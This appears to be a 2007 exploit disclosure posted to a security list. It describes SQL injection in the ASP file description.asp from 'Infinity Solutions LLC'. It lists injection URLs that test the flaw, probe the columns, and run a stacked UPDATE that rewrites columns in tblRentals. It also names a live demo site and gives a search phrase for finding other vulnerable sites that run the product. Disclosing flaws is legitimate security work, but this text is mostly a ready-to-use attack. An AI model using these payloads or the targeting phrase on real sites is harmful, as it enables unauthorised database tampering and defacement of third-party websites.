Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

Flashbb <= 1.1.7 - Remote File Inclusion Exploit

Entertainment CMS Admin Login Bypass

SYSTONÝCfr/porta l/ actualites.asp sql injection

MERCURY/Templates mercury.ASP SQL Injection

From:	okan alp <codexploder_(at)_hotmail.com>
Date:	10.07.2007
Subject:	http://marmarahosting.org/infinity.txt

"Infinity Solutions LLC" e/description.asp sql injection

***********************************************************
Credit    : CodeXpLoder'tq

mail      : codexploder[at]hotmail[dot]com

site      : Biyosecurity.net,expw0rm.com

thx       : BiyoSecurityTeam

spec.note : "Live The Life"

************************************************************

1-)  example.com/[patch]/description.asp?id=(sql methot)

1-)  example.com/e/description.asp?id=(sql methot)

************************************************************

2-)  example.com/e/description.asp?id=1'

2-) example.com/e/description.asp?id=1 having 1=1

2-) example.com/e/description.asp?id=1,2,3,4,5

2-) example.com/e/description.asp?id=1,2,3,4,5+update+tbl+set+column='your text or meta code';--


#tbl    : tblRentals
#column : model,category

**************************************************************

sourge site : http://www.infinitysolutionsllc.com/

demo site   : http://www.lcd-projector-rentals-ab.com

order code for views site :"Site Developed and Maintained by Infinity Solutions LLC"